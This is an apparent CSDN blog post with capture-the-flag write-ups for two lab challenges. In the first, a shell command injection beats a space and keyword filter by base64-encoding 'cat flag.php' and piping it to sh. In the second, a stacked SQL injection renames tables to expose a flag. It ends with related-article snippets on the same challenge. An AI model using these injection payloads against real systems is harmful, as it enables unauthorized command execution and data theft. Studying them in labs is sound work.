3月29日

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量431 收藏 9
点赞数 7
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82736056/article/details/137146854
版权

[GXYCTF2019]Ping Ping Ping1

打开后,题目给了提示/?ip= ,我们随意输入一个ip进行检查,存在回显。

接着我们查看文件目录,得到两个php文件,其中一个为flag文件。

我们尝试打开flag文件,用cat falg.php打开文件,显示fxck your space!通过搜索得知是该题过滤了空格,我们尝试利用其他符号来代替空格。

 输入cat,flag.php,题目提示我们fxck your flag!可知flag也被过滤了。

想到前面还有一个php文件,我们来打开看看index.php文件,打开后发现本题过滤了绝大多数符号,以及flag,flag字眼都过滤了,bash也没了,不过sh没过滤。

 

通过查看其他人的wp,得知可以将 cat flag.php转变为base64编码的字符,在进行flag查看。

Y2F0IGZsYWcucGhw是cat flag.php的base64-encode

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

 

输入后发现没有任何显示,我们来看看源代码,得到flag

[强网杯 2019]随便注1

由题目可知,本题考查的是sql注入

首先尝试出本题的字段数,输入1,2都存在回显,输入3时,无回显,可知字段数为2

输入1'查看是否存在sql注入点,输入后报错,说明存在注入点。

1';show databases;#爆出数据库

 

1';show tables;#爆出表名,有两个表,我们都打开看看。

我们在1919810931114514这个表中发现了flag

利用1';select from `1919810931114514`查看flag,无法显示,发现select被过滤了。

当表名为数字时,要用反引号``包起来查询

 

看了一下其他大佬的解法1,通过 rename 先把 words 表改名为其他的表名。

1.通过 rename 先把 words 表改名为其他的表名,如words1

2.把 1919810931114514 表的名字改为 words

3.给新 words 表添加新的列名 id

4.将 flag 改名为 data

5.输入1’ or 1=1#得到flag

1'; rename table words to words1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

通过查看两个表的内容可以看到words表里有两个属性,即两列:id 和data,而1919810931114514表里只有一个属性,说明输入框可能查询的就是words表,后台sql语句可能为

select id,data from words where id=

 所以我们改名后就可以得到flag

 

 

 

 

2401_82736056
关注
PROSAIL模型软件版2024年329发布
08-19
PROSAIL模型生理生化参数反演,敏感性分析等
Exercise-05b-FPS:MSCH-C220演习,2021年329
04-01
MSCH-C220演习,2021年329 有关此练习的演示,请访问 此练习是第一次使用Godot的3D功能的机会。 我们将创建一个简单的第一人称控制的角色,然后向场景中添加一些“构造实体几何”。 分叉此存储库。 该过程...
每天一道ctf
whisper921的博客
10-28 1047
有这样一行代码
[GXYCTF2019]Ping Ping Ping
V50小白
09-15 1237
1、 点开题目链接发现是ping一个ip的参数 2、 输入/?ip=127.0.0.1尝试,只出现一个响应,说明是Windows的ping命令 3、 输入/?ip=127.0.0.1;ls查看当前存在的目录文件夹 4、输入命令/?ip=127.0.0.1;cat flag.php查看flag文件,发现fxck your space!(关闭你的空间) 说明存在对空格的过滤 5、网上一般的判断空格过滤方法:判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用: 注:%20(spac
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1808
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
小米新品发布会2021 329小米新品发布会
sinat_50333224的博客
03-27 2708
小米生生不息新品发布会将在329召开,由于此次将发布小米11 Pro、小米11 Ultra和小米MIX新机三款重磅的高端旗舰机,所以许多网友将小米此次发布会称作是2021年科技界的春晚。的确,仅从目前官方预热的一些特性来看,其每一个配置都令人振奋,但没有想到的是,这些仅仅只是开胃小菜。 小米春季新品发布会直播地址http://www.xiaomi.cn 小米手机爆降500这活动太给力了 机会不容错过http://www.xiaomi.cn/11 预计此次发布会小米将推出包括小米11 Pro、小米11 U
(更新时间)2021年329 python基础知识(with语句和上下文管理器)
时光隧道
03-29 5万+
1. with语句的使用 with 语句的示例代码: # 1、以写的方式打开文件 with open("1.txt", "w") as f: # 2、读取文件内容 f.write("hello world") with 语句的这种写法,既简单又安全,并且 with 语句执行完成以后自动调用关闭文件操作,即使出现异常也会自动调用关闭文件操作。 2. 上下文管理器 自定义上下文管理器类,模拟文件操作: class File(object): # 初始化方法 def __ini
【历史上的今天】3 29 :“机器人三定律”问世;电脑动画首次获得奥斯卡;Caldera Linux 沉浮史
历史上的今天
03-29 7012
3 29 ,历史上的今天,阿西莫夫提出“机器人三定律”;第一部获得奥斯卡奖的计算机动画片;Caldera 和 SCO 合并为 Caldera International。
(更新时间)2021年329 python基础知识(property属性)
热门推荐
时光隧道
03-29 5万+
1. property属性的介绍 property属性就是负责把一个方法当做属性进行使用,这样做可以简化代码使用。 定义property属性有两种方式 装饰器方式 类属性方式 2. 装饰器方式 class Person(object): def __init__(self): self.__age = 0 # 装饰器方式的property, 把age方法当做属性使用, 表示当获取属性时会执行下面修饰的方法 @property def age(self)
AI:2019年329教育部最新公布35所大学获批四年制【人工智能】本科专业
近期请国内外头部出版社可尽快私信博主!——心比天高,仗剑走天涯,保持热爱,奔赴向梦想!低调,谦虚,自律,反思,成长,还算是比较正能量的博主,公益免费传播……内心特别想在AI界做出一些可以推进历史进程影响力的东西(兴趣使然,有点小情怀,也有点使命感呀)…
03-29 1万+
AI:2019年329教育部最新公布35所大学获批四年制【人工智能】本科专业 导读 趋势,对每个人而言,都是机会。东风若来,扶摇直上九万里,不会是梦。任何一个时代的机会从来不会自动消失,你错过机会是因为你缺少改变的勇气。很多时候就算机会来了,但你如果你一味的迷恋你的现状,你将会成为这个时代的牺牲品。 如果说趋势对于每个人而言都是机会,那么机会从来不会偏...
2021年1129yolov3害虫检测
萧鼎的博客
11-30 3523
1.pytorch-yolov3框架下载,在github和gitee中都可以下 2.下载相关的python库 3.环境是cuda10.1,torch是1.2.0,torchvision是0.4.0 4.害虫数据集,地址: 5.修改部分 6.训练好模型后加上我写好的qt界面测试,结果如下 ...
中国超高清视频(4K)产业发展大会329将在广州召开
中国计算机报
03-14 3183
记者前从中国超高清视频(4K)产业发展大会组委会了解到,由工业和信息化部、国家新闻出版广电总局、广东省人民政府主办,广东省经济和信息化委员会、广东省新闻出版广电局、广东省通信管理局、广州市人民政府、中国电子信息产业发展研究院和中国超高清视频产业联盟(筹)承办的中国超高清视频(4K)产业发展大会将于329在广东省广州市召开。此次大会的主题是“超清视界  智享未来”,主要内容包括一个主论坛、两个
全球独角兽名单(截至2022年329).xlsx
03-30
全球独角兽名单(截至2022年329).xlsx
北京市教委高校资产管理系统培训--329.pptx
09-23
北京市教委高校资产管理系统培训--329.pptx
安全教育主题班会-329安全教育主题校会演讲稿学习总结.doc
11-13
安全教育主题班会-329安全教育主题校会演讲稿学习总结.doc
4.网络编程
最新发布
weixin_45476535的博客
09-14 453
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 163
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
如何在DPDK中实现协议解析?
Do my best!
09-10 693
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
如何用3个零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 923
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2022年629:SpringBoot与Git操作技巧
3. **Pull**:从远程仓库获取最新的更改并合并到本地,确保你的代码是最新的。 在安装Git时,需要注意以下几点: - 安装路径避免包含中文字符或空格,以免引起不必要的问题。 - 安装完成后,检查Git是否已添加到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值